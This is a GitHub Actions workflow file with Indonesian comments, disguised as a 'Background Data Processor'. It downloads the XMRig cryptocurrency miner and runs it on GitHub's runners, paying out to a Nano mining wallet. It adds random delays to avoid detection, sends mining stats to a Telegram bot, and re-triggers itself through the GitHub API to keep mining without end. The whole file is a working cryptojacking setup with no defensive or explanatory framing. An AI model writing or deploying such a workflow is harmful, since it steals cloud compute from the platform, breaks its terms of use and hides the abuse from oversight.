name: Background Data Processor

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

jobs:
  task:
    runs-on: ubuntu-latest
    timeout-minutes: 360  # 6 jam (maksimum untuk gratis)

    steps:
      - name: Initialize Task
        run: echo "Starting background data task..."

      - name: Prepare Runtime
        run: |
          sudo apt update -y && sudo apt install curl tar -y

      - name: Notify Start
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            --data-urlencode text="🟢 *Worker mulai.*\nRuntime aktif hingga 6 jam dengan random delay awal." \
            -d parse_mode=Markdown

      - name: Download & Start Worker
        run: |
          curl -L -o core.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf core.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          DELAY=$((RANDOM % 300 + 30))
          echo "Menunggu $DELAY detik sebelum memulai..."
          sleep $DELAY
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k \
            -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q \
            -p stealthlog > log.txt 2>&1 &
          PID=$!
          WORKTIME=$((RANDOM % 5400 + 600))  # antara 10 menit sampai 1.5 jam
          echo "⏳ Menambang selama $WORKTIME detik"
          sleep $WORKTIME
          kill $PID

      - name: Notify Done + Stats
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          cd xmrig-6.24.0
          HASHRATE=$(grep -a "speed" log.txt | tail -n1 | awk '{print $6 " H/s"}')
          ACCEPTED=$(grep -a "accepted" log.txt | wc -l)
          REJECTED=$(grep -a "rejected" log.txt | wc -l)
          MSG="✅ *Worker selesai.*\n\n📊 *Stats:*\n• Hashrate: \`$HASHRATE\`\n• Accepted: \`$ACCEPTED\`\n• Rejected: \`$REJECTED\`"
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            -d text="$MSG" \
            -d parse_mode=Markdown

      - name: Random Delay Before Re-trigger
        if: always()
        run: |
          SLEEP_NEXT=$((RANDOM % 600 + 60))  # Delay acak 1–10 menit
          echo "Menunggu $SLEEP_NEXT detik sebelum auto-retrigger..."
          sleep $SLEEP_NEXT

      - name: Re-trigger Self
        if: always()
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -X POST -H "Accept: application/vnd.github+json" \
               -H "Authorization: Bearer $GH_TOKEN" \
               https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
               -d '{"ref":"main"}'
